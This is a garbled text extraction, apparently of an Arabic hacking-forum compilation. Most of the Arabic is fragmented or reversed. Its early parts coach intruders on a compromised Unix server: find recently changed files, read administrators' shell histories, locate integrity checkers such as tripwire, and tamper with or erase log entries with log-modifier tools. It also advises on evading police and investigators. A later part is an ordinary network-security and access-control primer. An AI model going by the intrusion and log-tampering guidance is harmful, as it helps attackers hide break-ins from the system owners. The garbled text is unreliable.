ﺘﺼﺎرﻟﻠﻨﻘﻄﻪاﻟﺴﺎﺑﻘﻪ ﻣﻮ ﺿ ﺤﻪﺑﺎﻟ ﺮﺳﻢﻓﻲاﻟﺼﻮرهاﻟ
ﺘﯿﺠﻪ وا ﺧ
ﻧ
***
ﺘﻰاﻟﻤﺨﻔﻲ ﻣﻨﻬﺎ ..ﻟﻠ ﺤﺼﻮ ل واﻟﻌﺜﻮر ﻋﻠﻰﻫﺬه ﻣﻦاﻟﻬﺎم ﻮاﻟ ﻀ ﺮوري ﺟﺪاانﺗﻌﺜ ﺮ ﻋﻠﻰﻛ ﻞ ﻣﻠﻔﺎ تاﻟﻠﻮ ق ﺣ
ﺘﯿﻦ : اﻟﻤﻠﻔﺎ ت ﯾﻤﻜﻦ ذﻟﻚﺑﻬﺎﺗﯿﻦاﻟﻄ ﺮﯾﻘ
ﺘﺼﺎر List Open ﺘﺨﺪامﺑ ﺮﻧﺎﻣ ﺞ LSOFﻫﻮا ﺧ ﺘﻮ ﺣﻪ :ﻮ ﯾﻤﻜﻨﻚ ذﻟﻚﺑﺎﺳ -١ﺛ ﺮ ﻋﻠﻰ ﺟﻤﯿﻊاﻟﻤﻠﻔﺎ تاﻟﻤﻔ
ﺘﻌﺪﯾ ﻞﻓﯿﻬﻢ Filesﻮ ﻣﻦﺛﻢ ﯾﻤﻜﻦاﻟﻌﺜﻮر ﻋﻠﯿﻬﻢ واﻟ
ﺘﻲﺗﻐﯿ ﺮ ت ) ﺣﺪ ثﻓﯿﻬﺎﺗﻐﯿﯿ ﺮ ( ﻣﻦﺑﻌﺪ د ﺧﻮﻟﻚ - -٢ﺣﺚ ﻋﻦﻛ ﻞاﻟﻤﻠﻔﺎ تاﻟ
ﺑﻌﺪ د ﺧﻮﻟﻚﻗﻢﺑﻌﻤ ﻞ touch /tmp/checkﻮﺑﻌﺪﻫﺎﻗﻢ ""find / -newer /tmp/check -print
٥٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺨﺪم wtmpxﻮ utmpxﺎﯾ ﻀﺎﻓﻤﻊاﻻﺳ ﻒ ﻋﺰﯾﺰاﻧ ﺖﻓﻲ ور ﻃﻪ !!!ﻓﺎﻧﺎ ﻋﻠﻰاﻋ ﺮ ف ﺎذاﻛﺎناﻟﻨﻈﺎم ﯾﺴ
ﺘﻄﻌ ﺖانﺗﺒ ﺮﻣ ﺞ وا ﺣﺪ )ﻟﻼ ﺧﻮهاﻟﻤﺒ ﺮﻣﺠﯿﻦ (ﻻﺗﻨﺴﻰانﺗﻌﻠﻨﺎﺑﻪ
ﺘﻌﺎﻣ ﻞﻓﻲﻫﺬهاﻟ ﺤﺎﻟﻪ ..ﻟﻮاﺳ
ايﺑ ﺮﻧﺎﻣ ﺞﻟﻠ
=(
٥٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﻚ ﺘﻄﺎﻋ ﻗﻊ.أد ﺧ ﻞإﻟﻰ ﻣﺠﻠﺪاﺗﻬﻢاﻟﺨﺎﺻﻪ )ﻓﻲ ﺣﺎﻟﻪ ﻋﺪمﺄﺳ ﯾﻌﺪﻛ ﻞ ﻫﺬا ،ﯾﻤﻜﻨﻚ ﻣﻌ ﺮﻓﻪﻛ ﻞاﻟﻤﺪرا ء ﻋﻠﻰاﻟﻤﻮ
ﺘﺨﺪم( .وأﻓ ﺤ ﺺاﻟﻤﻠﻔﺎ ت ﺘ ﺤﺎ ل ﺷﺨﺼﯿﻪ ﺎﻟﻤﺴ ﺘﺎﻟﯿﻪ chid.c, changeid.cﻷﻧ ﺘﺨﺪمأ ﺣﺪىاﻷدوا تاﻟ ،أﺳ
ﺘﻌﻤﻠﻮﻧﻬﺎ ﻋﺎدة،ﻗﺪ ﯾﻔﯿﺪك ﺘﻲ ﯾﺴﺘﺎﻟﯿﻪ history/.sh_history/.bash_historyﻟﻤﻌ ﺮﻓﻪ ﺎﻷواﻣ ﺮاﻟ اﻟ
ﺘﺸﺎ ف ﻣﻌﻠﻮﻣﺎ ت ﻣﺨﻔﯿﻪ.ﻗﻢﺑﻔ ﺤ ﺺ ﻣﻠﻔﺎ ت ﻗﻊ،أوﺄﻛ ﻫﺬاﻓﻲ ﻣﻌ ﺮﻓﻪ دوراﻟﻤﺪﯾ ﺮ ﻋﻠﻰاﻟﻤﻮ
ﺘﺨﺪم ،وإذا ﻣﺎﻛﺎﻧ ﺖأدوا ت ﺘﻲﺗﺴ ـ aliasﺎﻟ .profile/.login/.bash_profileﻟﻤ ﺮاﺟﻌﻪﺄﻋﺪادا تاﻟ
ﺘﺨﺪﻣﻪ .و ﻣﻦ ﺎﻟﻄﺒﯿﻌﻲ ﻃﺒﻌﺎأنﺗﻘﻮمﺑﻔ ﺤ ﺺﻛﺎﻓﻪاﻟﻤﻠﻔﺎ ت واﻟﻤﺠﻠﺪا ت ،ﺧﺎﺻﻪاﻟﻤﺨﻔﯿﻪ ﻣﻨﻬﺎ أﻣﻨﯿﻪ ﺧﻔﯿﻪ ﻣﺴ
ﻗﺪﺗﺠﺪﺑﻌ ﺾ ﺎﻷﺷﯿﺎ ءاﻟﻤﻔﯿﺪه ﺣﻘﺎ
ﺘ ﺤﻘ ﻖ ﻣﻦ ﺣﺪو ثايﺗﻐﯿﯿ ﺮا تﻓﻲ ﺎﻟﻤﻠﻔﺎ ت ،وﻓﻲ ﺣﺎﻟﺔ ﺣﺪو ثاي ﺘﻌﻤﺎ لﺑ ﺮاﻣ ﺞﻟﻠﺑﻌ ﺾاﻟﻤﺪرا ء وﯾﻘﻤﻮنﺑﺎﺳ
ﺘﺸﺎﻓﻬﺎ ﺘﻄﯿﻊاﻛ ﺗﻐﯿ ﺮ ،ﯾﻘﻮمﺑﻔ ﺤ ﺺاﻟﻤﻠﻔﺎ ت وﯾﺴ
ﺘﺨﺪﻣ ﺖ؟ واذاﻋ ﺮﻓ ﺖﻓﻜﯿ ﻒﺗﻌﺪﻟﻬﺎﺑ ﺤﯿﺚﺘ ﺤﻘ ﻖ واياﻻﻧﻮا عاﺳﺘﺨﺪﻣ ﺖ ﻫﻨﺎكﺑ ﺮاﻣ ﺞاﻟ ﻓﻜﯿ ﻒﺗﻌ ﺮ ف ﻣﺎاذااﺳ
ﺗﺨﺪم ﻣﻦاﺟﻠﻚ ؟
ﺘﺸﺎ ف ﻣﺎاذاﺘﺎﺑﺔ وا ﺣﺪة ﻣﻨﻬﺎﺑﻨﻔﺴﻚ وﻟﻜﻦ ﻣﻦاﻟﺼﻌﺐاﻛ ﺘ ﺤﻘ ﻖ وﻣﻦاﻟﺴﻬ ﻞﻛ ﻫﻨﺎكاﻧﻮا ع ﻋﺪﯾﺪة ﻣﻦﺑ ﺮاﻣ ﺞاﻟ
ﺘﺨﺪﻣ ﺖ ﻣﺜ ﻞﺗﻠﻚاﻟﺒ ﺮاﻣ ﺞ ﻋﻠﻲاﻟﻤﻠﻔﺎ تﻟﻠ ﺤﻤﺎﯾﺔ اﺳ
ﺘﻲﺗﻘﻮم ب ﻋﻤﻠﯿﺔﻓ ﺤ ﺺchecksum ﻫﺬهاﺳﻤﺎ ءﺑﻌ ﺾاﻟﺒ ﺮاﻣ ﺞاﻟ
SOFTWARE : STANDARD PATH : BINARY FILENAMES
tripwire : /usr/adm/tcheck, /usr/local/adm/tcheck : databases, tripwire
binaudit : /usr/local/adm/audit : auditscan
hobgoblin : ~user/bin : hobgoblin
raudit : ~user/bin : raudit.pl
l5 : compile directory : l5
ﺘﻤﺎﻻ تﻛﺜﯿ ﺮة ،رﺑﻤﺎاﻟﺒ ﺮﻧﺎﻣ ﺞ ﻧﻔﺴﻪاوﻗﻮاﻋﺪاﻟﺒﯿﺎﻧﺎ ت ﯾﻮﺟﺪ ﻋﻠﻲ ﺟﺰ ء آ ﺧ ﺮ ،ﻣﺜ ﻞ ﺟﺰ ء ﻛﻤﺎﺗ ﺮيﻫﻨﺎكا ﺣ
ﺘﻲﺗ ﺤﻤ ﻞ ﻣﻌﻠﻮﻣﺎ ت checksumﻓﻲ ﺟﻬﺎز ﺘﻲﻗﻮاﻋﺪﺑﯿﺎﻧﺎ تاﻟ NTFSﻟﻤ ﻀﯿ ﻒاو ﺟﻬﺎز آ ﺧ ﺮ ،او ﺣ
ﻗ ﺮا ص CDﻣﺜﻼ ( ... ﺘﺎﺑﺔ )اﻣ ﺤﻤﻲ ﻋﻠﻲ ﺎﻟﻜ
ﺘﻚ،
ﺘﺨﺪمﻓﻔ ﺮﺻ ﺘﺨﺪﻣﺔ ،واذاﻟﻢﺗﺴ ﺘﻄﻼﻋﻲ ﺳ ﺮﯾﻊﻟﻤﻌ ﺮﻓﺔاﻟﺒ ﺮاﻣ ﺞاﻟﻤﺴ ﻮﻟﻜﻦ ﯾﻤﻜﻨﻚاﻟﻘﯿﺎمﺑﻌﻤﻠﯿﺔﻓ ﺤ ﺺاﺳ
٥٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﻗﻊاواﻟﻤﺰود
ﺘﻠﻚاﻻﻧﻮا ع ﻣﻦاﻟﺒ ﺮاﻣ ﺞ ﻫﺬا ﯾﻌﻨﻲاناﻟﻤﻮ ﺘﺨﺪاﻣﻬﻢﻟ
ﺘﺎﻛﺪا ﻣﻦاﺳ
ﻮاذاﻟﻢﺗﺠﺪ ﺷﻲ وﻟﻜﻨﻚﻛﻨ ﺖ ﻣ
ﻣ ﺤﻤﻲﺑﺸﻜ ﻞ ﺟﯿﺪا )ﻫﺎردﻟﻚ ( وﯾﺠﺐان ﻻﺗﻌﺒﺚﺑﺎﻟﻤﻠﻔﺎ تاﺑﺪا ..
ﺘﻰﺗﺜﺒ ﺖﺑ ﺮاﺗﻪ ﺘﻘﺎد ﺎ ل administratorsﺎﻧﻚ hackerﻓﺎﻧ ﺖ == > ﻣﺬﻧﺐ ﺣ -ﻣﻠ ﺤﻮﻇﻪ :انﻛﺎنﻓﻲاﻋ
...
ﺘﻘﺪاﻧﻪ ﻻ ﯾﻮﺟﺪﻓ ﺮ قﺑﯿﻦا ل hackerﻮا ل ﻗﺎ تاﻋ ﻻﯾﻌﻨﻲ ﺎﻟﻘﺎﻧﻮناي ﺷﺊﻟ ﻞ ( adminsﺑﻌ ﺾاﻻو
ﺘﻘﺪون ﺎﻧﻚﻫﺎﻛ ﺮ administratorﺎﻻﺑﺎن ﻣﺎﻟﻚاﻟﻜﻮﻣﺒﯿﻮﺗ ﺮ ﻫﻮا ل administratorﻓﻘﻂ ( ﻋﻨﺪﻣﺎ ﯾﻌ
ﺘ ﺮ فاﻻدﻣﯿﻦ ﺘ ﺮوﻧﻲ و ﻣﻠﻔﺎﺗﻚ ﻮانﻛﺎن ﻣ ﺤ ﻗﺒﺔﺑ ﺮﯾﺪكاﻟﻠﻜ ﻓﺎﻧﻚﻓﻮراا ﺻﺒ ﺤ ﺖ ﻣﺬﻧﺐ ..ﺳﯿﻘﻮﻣﻮ ﻣﺒﺎﺷ ﺮةﺑﻤ ﺮا
ﺳﯿ ﺮ ﺻﺪكاﯾ ﻀﺎ ﻫﺠﻤﺎﺗﻚاﻻ ﺧ ﺮى ..
ﻗﺒﺔ ﺧﻂﺗﯿﻠﯿﻔﻮﻧﻚ ..
ﻗﺒﺔﻛ ﻞ ﻫﺬهاﻻﺗﺼﺎﻻ تاﻛﯿﺪﺑﺒﺴﺎ ﻃﻪ ﯾﻤﻜﻨﻬﻢ ﻣ ﺮا ﺎذاﻛﺎن ﯾﻤﻜﻨﻬﻢ ﻣ ﺮا
ﺘﻰارد تانﺗ ﺤﺬرا ﺻ ﺤﺎﺑﻚﻓﻼﺗﺨﺒ ﺮﻫﻢ ﻗﺎﺗﻚ ..وان ﺣ ﺘﺮ ﻟﺬاﻓﻌﻠﯿﻚ ﻋﺪماﻟﻘﯿﺎمﺑﺎياﺗﺼﺎﻻ تﻓﯿﻬﺎا ﺧﺒﺎرا ﺧ
ﺘ ﺮوﻧﻲ )اﻻاذاﻛﺎن ﻣﺸﻔ ﺮا( و ﻣﻦاﻻﻓ ﻀ ﻞانﺗﺨﺒ ﺮﻫﻢ ﻋﻨﺪﻣﺎﺗﻘﺎﺑﻠﻬﻢ وﺟﻬﺎﻟﻮﺟﻪ ..و ﻫﺎﺗﻔﯿﺎاوﺑﺒ ﺮﯾﺪاﻟﻜ
ﺗﻤﻨﻌﻬﻢ ﻣﻦ راﺳﺎ لاي رﺳﺎﺋ ﻞ ﻏﯿﯿ ﺮ ﻋﺎدﯾﻪ ..
ﺘﻘﺪﺘﻮاﺟﻪ ﻣﺸﺎﻛ ﻞ ﺎﻋﻗ ﻞ ﻣﻦ ﺷﻬ ﺮاﻟﻰ ﺷﻬ ﺮﯾﻦ ..واﻻ ﺳ ﺘﺆﻣﻦ ﻧﻔﺴﻚ ﻋﻠﯿﻚانﺗﺒﻘﻰ ﻋﻠﻰﻫﺬااﻟ ﺤﺎ ل ﻋﻠﻰاﻻ ﻟ
٥٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺎﻧﻚ ﻻﺗ ﺮﻏﺐﺑﻬﺎ
**************
ﺘ ﺤﻘﯿ ﻖﺑﻤﻔ ﺮدك ..ﻓﺎ ﻃﻠﺐ ﻣ ﺤﺎﻣﯿﻚﻛﻲ ﺘﺬﻛﻰاﻧ ﺖ وﺗ ﺮد ﻋﻠﻰاﻟﺎوﻻ :ا ﻃﻠﺐ ﻣ ﺤﺎﻣﯿﻚﻓﻮرا !!!! :ﻻﺗ ﺤﺎو لﺑﺎنﺗ
ﯾﺪاﻓﻊ ﻋﻨﻚﻫﻮ و ﯾﻄﻠﻌﻚ ﻋﻠﻰ ﻣﺎ ﯾﺠﺐانﺗﺬﻛ ﺮه و ﻣﺎ ﯾﺠﺐان ﻻﺗﺬﻛ ﺮه ﻧﻬﺎﺋﯿﺎ ..ﺑﻌﺪﻫﺎ ﻏﺎﻟﺒﺎ ﻣﺎ ﺳﯿﻄﻠﺐ
ﺘﯿﺎﺟﻪﻓﻲاﻟﻌﻤ ﻞ واﻻ ﻋﻠﯿﻬﻢﺗ ﺤﻤﯿ ﻞ ﺟﻤﯿﻊاﻻﻋﺒﺎ ء ﻗﺼﻰ ﺳ ﺮﻋﻪﺑ ﺤﺠﺔا ﺣ اﻟﻤ ﺤﺎﻣﻲ ﺟﻬﺎزك )اﻟﻜﻮﻣﺒﯿﻮﺗ ﺮ (ﺑﺎ
ﺘﺨﺪاماﻟﺠﻬﺎز ..ﻟﺬاﻓﺎﻧﻪ ﻣﻦاﻟﻌﻤﻠﻲ ﺟﺪاان ﯾﻜﻮن ﻋﻨﺪك ﺘﻲﻗﺪﺗ ﺤﺪ ث ﻋﻦ ﻋﺪكاﺳ اﻟﻤﺎدﯾﻪ واﻟﻤﺸﺎﻛ ﻞاﻟ
ﺘﺪوﯾ ﺮﻗ ﺖﻗﺒ ﻞانﺗﻘﻊاﻟﻔﺎسﻓﻲاﻟ ﺮاس وﺑﻌﺪﻫﺎﺗﺒﺪاﻓﻲاﻟﺒ ﺤﺚ واﻟ ﻣ ﺤﺎﻣﻲ ﺟﺎﻫﺰﻓﻲاي و
ﺘﻜﻠﻢاﻻاﻟﺸ ﺮ ﻃﻪ !!! :ﻻﺗﻌﻄﻲﻟﻠﺸ ﺮ ﻃﻪاي ﻣﻌﻠﻮﻣﺎ ت ﻋﻨﻚاو ﻋﻦ زﻣﻼﺋﻚﺑ ﺤﺠﺔان ﻫﺬا ﺛﺎﻧﯿﺎ :اﺑﺪا ﻻﺗ
ﺳﯿﺨﻔ ﻒاﻟﻌﻘﺎب ﻋﻨﻚ و ﺳﯿﺨ ﺮﺟﻚ ﻣﻦاﻟﻤﺎز ق ..ﻻن ﻫﺬاﻟﻦ ﯾﻔﯿﺪكﺑ ﻞ ﺳﯿﺪﯾﻨﻚاﻛﺜ ﺮ ..وانﻛﺎن ﯾﺠﺐ
ﻗﻚ (
ﺘﻢ ﻫﺬاﻓﻘﻂ ﻣﻦ ﺧﻼ ل ﻣ ﺤﺎﻣﯿﻚ ) وﻫﺬااﯾ ﻀﺎ ﺣ ﻖ ﻣﻦ ﺣﻘﻮ ﺘﺠﻮاﺑﻚﻓﺎ ﻃﻠﺐان ﯾ اﺳ
ﺘﺴﻊ ﺘﻗﺎؤكﻟﯿ ﺲﻗﻘﻂﻛﻨﻮ ع ﻣﻦاﻟﺸﻬﺎﻣﻪ ..اﻧﻤﺎاﯾ ﻀﺎﺑﺪ ﺧﻮ لا ﺻ ﺤﺎﺑﻚﻓﻲ ﺎﻟﻤﻮ ﺿﻮ ع ﺳ ﻻﺗﺨﺒ ﺮاﺑﺪا ﻋﻦاﺻﺪ
داﺋ ﺮةاﻟﻤﻮ ﺿﻮ ع و ﻣﻦﺛﻢﺗﺰﯾﺪاﻟﻤﻌﻠﻮﻣﺎ ت ﻋﻨﻚ و ﻋﻦ ﺟ ﺮاﺋﻤﻚ و ﻫﻢاﯾ ﻀﺎ!
ﺘﻄﻊاﻟﺸ ﺮ ﻃﻪﻓﻚﺗﺸﻔﯿ ﺮ ﻣﻠﻔﺎﺗﻚاو ﺟﺰ ء ﻣﻦ ﺎﻟﻬﺎرد دﯾﺴﻚﻓﯿﻤﻜﻨﻚ ﺑﻌ ﺾاﻟﺪو ل ﻣﻦ ﺿﻤﻦﻗﺎﻧﻮﻧﻬﺎاﻧﻪاذاﻟﻢﺗﺴ
ﺘﻬﻰاﻟ ﺤ ﺮﯾﻪ ﻋﺪماﻻﻓﺼﺎ ح ﻋﻨﻬﺎ ﺑﻤﻨ
ﻗﻌ ﺖﻓﻲاﻟﻤﺼﯿﺪه ﻻﺑﺪانﺗﺪﻟﻲﻟﻬﻢﺑﻜ ﻞ ﺷﺊﻓﻲ ﻫﺬه ﻟﻜﻦﺑﻌ ﺾاﻟﺪو لاﻻ ﺧ ﺮىﻓﻲﻗﺎﻧﻮﻧﻬﺎاﻧﻪ ﻣﺎداﻣ ﺖ و
ﻗ ﺮا ص ﺻﻠﺒﻪ ﻣﺸﻔ ﺮه ﺘﺸﺎرة ﻣ ﺤﺎﻣﯿﻚ واﻧﻜﺎراﻧﻚﻟﺪﯾﻚايا اﻟ ﺤﺎﻟﻪاﻧﺼ ﺤﻚﺑﺎﺳ
ﺎﻟﺠﺰ ءاﻟﺴﺎﺑﻊ:
========
ﺘﺒﺎ ء:
ﺘﺨﻔﻲ واﻻ ﺧ ﻗﺎﺋﻤﻪﺑﺎﻓ ﻀ ﻞاﻟﺒ ﺮاﻣ ﺞﻟﻠ
******************************
Change - Changes fields of the logfile to anything you want
Delete - Deletes, cuts out the entries you want
Edit - real Editor for the logfile
Overwrite - just Overwrites the entries with zero-value bytes.
!Don't use such software (f.e. zap) - it can be detected
---------------------------------------------------------------
LOG MODIFIER
++++++++++
٥٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
٥٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$
ﻗﻪﻟﺸﺒﻜﺔاﻟﻌﻘ ﺮب
ﺣﻘﻮ
$$$$$$$$$$$$$
ﺘﺪاك /
ﺘﻢﺑﻬﺎ ﺣﻤﺎﯾﺔ ﻣﻨ
ﺘﻲ ﯾ
ﺘﺪى ) ( vbﺑﻌ ﺾاﻷﺳﺎﺳﯿﺎ تاﻟ
ﺈﻟﯿﻚ ﻣﺪﯾ ﺮأي ﻣﻨ
ﺘﺪى وﻛ ﻞ ﺷﻲ ء
ﺘﺐﻓﯿﻪاﻟﻤﺸﺎرﻛﺎ ت وﺗﻌﺪﯾ ﻞاﻟﻤﻨ
ﺛﻨﯿﻦ وا ﺣﺪﺗﻜ
ً وﻗﺒ ﻞﻛ ﻞ ﺷﻲ ءاﻟﻤﺪﯾ ﺮاﻟﻌﺎم ﺿﻊ ﻣﺪﯾ ﺮﯾﻦإ -١ﻻ
ﺘﯿﺎط ﻋﻨﺪﻣﺎ ﯾﺴ ﺮ قاﻟﻤﺪﯾ ﺮاﻟﻌﺎم .
واﻵ ﺧ ﺮﻟ ﻺ ﺣ
ـﻤﺠﻠﺪ adminﺑﻮاﺳﻄﺔاﻟﻤﻔﻜ ﺮة و
ﺘﺢ ﻣﻠ ﻒ index.phpﺎﻟﻤﻮﺟﻮدﺑﺘ ﺤﻜﻢﺑﻜﻠﻤﺔ ﺳ ﺮأيإﻓ
-٢ﻣﻲﻟﻮ ﺣﺔاﻟ
أ ﺿ ﻒ ﻋﻠﯿﻪﻛﻮدﻛﻠﻤﺔاﻟﺴ ﺮاﻟﺬي ﻫﻮ /
<?php
;"$LOGIN = "User
;"$PASSWORD = "Password
٥٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
٦٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
"أﻣﻦ اﻟﺸﺒﻜﺎت"
$$$$$$$$$
اﻟﻜﺎﺗﺐ:اﻟﺠﻮﻛ ﺮ
$$$$$$$$$
ﻗﺎﯾﺔ ﻣﻨﻬﺎ.
ﺘﻌ ﺮ ضﻟﻬﺎاﻟﺸﺒﻜﺔ وﻛﯿﻔﯿﺔاﻟﻮ ﺘﻲﻗﺪﺗ -١ﻋ ﺮ ضﻟﺒﻌ ﺾ ﺎﻟﻤﺨﺎ ﻃ ﺮاﻷﻣﻨﯿﺔاﻟ
ﻗﺔ ﺎﻟﻮﻟﻮجاﻟﻰاﻟﺸﺒﻜﺔﺑﺄﻣﻨﻬﺎ. -٢ﻮ ﺻ ﻒﻟﻌﻼ
-٣ﻛﯿﻔﯿﺔ ﺣﻤﺎﯾﺔاﻟﻤﻮاردﺑﻮاﺳﻄﺔﺗ ﺮا ﺧﯿ ﺺاﻟﻮ ﺻﻮ ل.
-٤ﺷ ﺮ حﻟﻤﻜﻮﻧﺎ ت ACL.
ﺘ ﺮا ﺧﯿ ﺺ.
-٥ﺷ ﺮ حﻟﻌﻤﻠﯿﺔﺗﻔ ﺤ ﺺاﻟ
-١ﺎﻟﻤﻌﺪا ت.
-٣ﺎﻟﺒﯿﺎﻧﺎ ت.
-٣ﻋﻤﻠﯿﺎ تاﻟﺸﺒﻜﺔ.
-٤ﺎﻟﻤﻮارد.
ﺘﺪاوﻟﺔ ﻋﺒ ﺮاﻟﺸﺒﻜﺔ.
ﺘﻤﺪ درﺟﺔأﻣﻦاﻟﺸﺒﻜﺔ ﻋﻠﻰ ﻣﺪى ﺣﺴﺎﺳﯿﺔاﻟﺒﯿﺎﻧﺎ تاﻟﻤ
ﺗﻌ
ﺘ ﺤﻜﻢ
ﺘ ﺤﻜﻢﻓﻲأﻣﻨﻪاﻟﺨﺎ ص ،ﺑﯿﻨﻤﺎ ﯾ
ﺘﻢﺗﻨﻈﯿﻢاﻷﻣﻦ وﻓﻘﺎﻟﻨﻮ عاﻟﺸﺒﻜﺔ ،ﻓﻔﻲ ﺷﺒﻜﺎ تاﻟﻨﺪﻟﻠﻨﺪﻛ ﻞ ﺟﻬﺎز ﯾ
ﻮﯾ
اﻟﻤﺰودﻓﻲﺄﻣﻦ ﺷﺒﻜﺎ تاﻟﺰﺑﻮناﻟﻤﺰود.
ﺘﺠﺴ ﺲ.
-٣ﺣﻤﺎﯾﺔاﻷﺳﻼكاﻟﻨ ﺤﺎﺳﯿﺔ وإ ﺧﻔﺎ ءﻫﺎ ﻋﻦاﻷﻋﯿﻦﻷﻧﻬﺎﻗﺪﺗﻜﻮن ﻋ ﺮ ﺿﺔﻟﻠ
ﻗ ﺮا ص ﺻﻠﺒﺔ ،
ﺘﻰأﻗ ﺮا ص ﻣ ﺮﻧﺔأو ﻣ ﻀﻐﻮ ﻃﺔأو ﺣﺘﻮي ﻋﻠﻰ ﻣ ﺤ ﺮﻛﺎ تأﺘﺨﺪﻣﯿﻦﺑﺄﺟﻬﺰة ﻻﺗ ﺤ -٥ﺗﺰوﯾﺪاﻟﻤﺴ
ﻗﻼ ع ROM Boot Chipﻮ ﻋﻨﺪﺗﺸﻐﯿ ﻞ ﻫﺬهاﻷﺟﻬﺰة ﻗﺔإ ﻗﺎ
ﺘﺨﺪام ر
ﺘﺼ ﻞ ﻫﺬه ﺎﻷﺟﻬﺰةﺑﺎﻟﻤﺰودا تﺑﺎﺳ وﺗ
ﻗﻼ عﻓﻲ ذاﻛ ﺮة RAMﻟﻠﺠﻬﺎزﻟﯿﺒﺪأﺑﺎﻟﻌﻤ ﻞ. ﺘ ﺤﻤﯿ ﻞﺑ ﺮﻧﺎﻣ ﺞاﻹﯾﻘﻮماﻟﻤﺰودﺑ
٦١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﻢاﻟﻮﺻﻮ لﻟﻬﺬهاﻟﻤﻮاردﻓﻘﻂ
ﺘﻬﺎ و ﯾ
ﺘﻢﺗﻌﯿﯿﻦﻛﻠﻤﺔ ﺳ ﺮﻟﻜ ﻞ ﻣﻦاﻟﻤﻮارداﻟﻤﻄﻠﻮب ﻣﺸﺎرﻛ ﻓﻲاﻟﻨﻈﺎماﻷو ل ﯾ
ﻣﻦﻗﺒ ﻞ ﻣﻦﻟﺪﯾﻪﻛﻠﻤﺔاﻟﺴ ﺮ.
ﺘﻄﯿﻊﺗ ﺤﺪﯾﺪ درﺟﺔاﻟﻮ ﺻﻮ لﻫ ﻞ ﻫﻲﻟﻠﻘ ﺮا ءةﻓﻘﻂأم وﺻﻮ لﻛﺎﻣ ﻞأم وﻓﻘﺎﻟﻜﻠﻤﺔاﻟﺴ ﺮ.
ﻛﻤﺎﺗﺴ
ﺘﺨﺪﻣﯿﻦ ،و ﯾﻜﻔﻲأن ﺘﺨﺪمأو ﻣﺠﻤﻮﻋﺔ ﻣﺴ ﺘﺼﺎرﯾﺢﻟﻜ ﻞ ﻣﺴ ﺘﻢﺗﻌﯿﯿﻦاﻟ ﺤﻘﻮ ق وإﻋﻄﺎ ءاﻟ ﻓﻲاﻟﻨﻈﺎماﻟﺜﺎﻧﻲ ﯾ
ﺘﺨﺪم و ﺘﻌ ﺮ فاﻟﻨﻈﺎم ﻋﻠﻰ ﺣﻘﻮ ق ﻫﺬااﻟﻤﺴﺘﺸﻐﯿ ﻞﻟﯿ
ﺘﺨﺪمﻛﻠﻤﺔاﻟﻤ ﺮور ﻋﻨﺪاﻟﺪ ﺧﻮ لاﻟﻰ ﻧﻈﺎم ﺎﻟ ﯾﺪ ﺧ ﻞاﻟﻤﺴ
ﺘﺒ ﺮﻫﺬااﻟﻨﻈﺎمأﻛﺜ ﺮأﻣﻨﺎ ﻣﻦاﻟﻨﻈﺎماﻟﺴﺎﺑ ﻖ و ﯾﻌﻄﻲ ﻣﺪﯾ ﺮاﻟﺸﺒﻜﺔﺗ ﺤﻜﻤﺎأﻛﺒ ﺮﺑﻜ ﻞﺘﻮﻓ ﺮةﻟﻪ ،و ﯾﻌﺘﺼﺎرﯾﺢاﻟﻤ اﻟ
ﺘﺨﺪم.ﻣﺴ
ﺘﺨﺪم.
ﺘﻤﻲﻟﻬﺎاﻟﻤﺴ
ﺘﻲ ﯾﻨ
ﺘﻲﺗ ﺤﺪداﻟﻤﺠﻤﻮﻋﺔاﻟ
-٢ﻣﻌ ﺮﻓﺎ تاﻟﻤﺠﻤﻮﻋﺔ Group SIDsﻮﻫﻲاﻟ
ﺘﻚ و ﯾﻄﻠ ﻖ
ﺘﻚاﻹﺗﺼﺎ ل ﻣﻦ ﺟﻬﺎزكﺑﺠﻬﺎز آ ﺧ ﺮ ﻋﻠﻰ ﺷﺒﻜ
ﺘﻢﺈ ﺻﺪار Access Tokenﻋﻨﺪ ﻣ ﺤﺎوﻟ
ﻛﻤﺎأﻧﻪ ﯾ
ﻋﻠﻰ ﻫﺬااﻹﺟ ﺮا ءاﻟﻮﻟﻮج ﻋﻦﺑﻌﺪ Remote Logon.
ﺘﻲ ﯾﺠﺐ ﻣ ﺮاﻋﺎﺗﻬﺎ ﻋﻨﺪاﻟ ﺤﺪﯾﺚ ﻋﻦأﻣﻦاﻟﺸﺒﻜﺔﻫﻮاﻟﻤ ﺤﺎﻓﻈﺔ ﻋﻠﻰأﻣﻦاﻟﻤﻮارد ﻣﺜ ﻞاﻟﻄﺎﺑﻌﺎ ت و ﻣﻦاﻷﻣﻮراﻟ
ﺘﺨﺪام ﻫﺬهاﻟﻤﻮارد.
ﺘﻌﯿﯿﻦﺗﺼﺎرﯾﺢ ﻹﺳ ﺘﻲ ﯾﻘﻮ م ﻣﺪﯾ ﺮاﻟﺸﺒﻜﺔﺑ ﻗ ﺮا ص و ﺎﻟﻤﻠﻔﺎ ت واﻟﻣ ﺤ ﺮﻛﺎ تاﻷ
ﺘﻲﻗﺪﺗﻌﻄﻰﻟﻠﻮ ﺻﻮ لاﻟﻰاﻟﻤﻠﻔﺎ ت ﻣﺎ ﯾﻠﻲ: ﺘﺼﺎرﯾﺢاﻟ ﻮ ﻣﻦ ﺎﻟ
٦٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﻄﺒﯿﻘﺎ ت.
-٢ﺗﺼ ﺮﯾﺢﺗﻨﻔﯿﺬﻟﻠ
ﺘﻮىاﻟﻤﻠﻔﺎ ت.
ﺘﻌﺪﯾ ﻞﻓﻲ ﻣ ﺤﺘﺎﺑﺔ ﻮ ﯾﺴﻤﺢﺑﺎﻟ -٣ﺗﺼ ﺮﯾﺢﻛ
ﺘﺨﺪام No Access. -٤ﻣﻤﻨﻮ عاﻹﺳ
